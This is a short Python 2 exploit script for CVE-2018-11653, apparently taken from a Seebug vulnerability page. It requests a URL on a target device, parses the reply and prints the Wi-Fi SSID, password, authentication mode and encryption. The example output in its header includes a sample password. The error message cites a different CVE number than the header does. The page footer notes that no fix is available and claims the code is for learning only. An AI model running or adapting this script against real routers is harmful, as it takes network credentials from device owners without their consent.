import requests import sys ''' Author: David Castro (SadFud) Contact: https://twitter.com/SadFud75 CVE: CVE-2018-11653 Example output: SSID = vodafone9AC1 Password = RLYVECHR4WMTBB AuthMode = WPA2PSK EncrypType = AES Channel = 0 Wireless Status = Desactivated ''' url = str(sys.argv[1]) r = requests.get(url); print "Establishing connection to the target..." if r.status_code != 200: print "Error. Check if the target is exploitable with CVE-2018-11654" exit() r = r.text.encode('utf8') print "Parsing data..." todo = r.split("\n") wifi = todo[5].split("=") password = todo[8].split("=") password = password[1] if wifi[1] == 1: todo[5] = 'Activated' else: todo[5] = 'Desactivated' print str(todo[2]).replace('=', ' = ') print "Password = " + str(password) print str(todo[6]).replace('=', ' = ') print str(todo[7]).replace('=', ' = ') print str(todo[4]).replace('=', ' = ') print "Wireless Status = " + str(todo[5]).replace('=', ' = ')
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论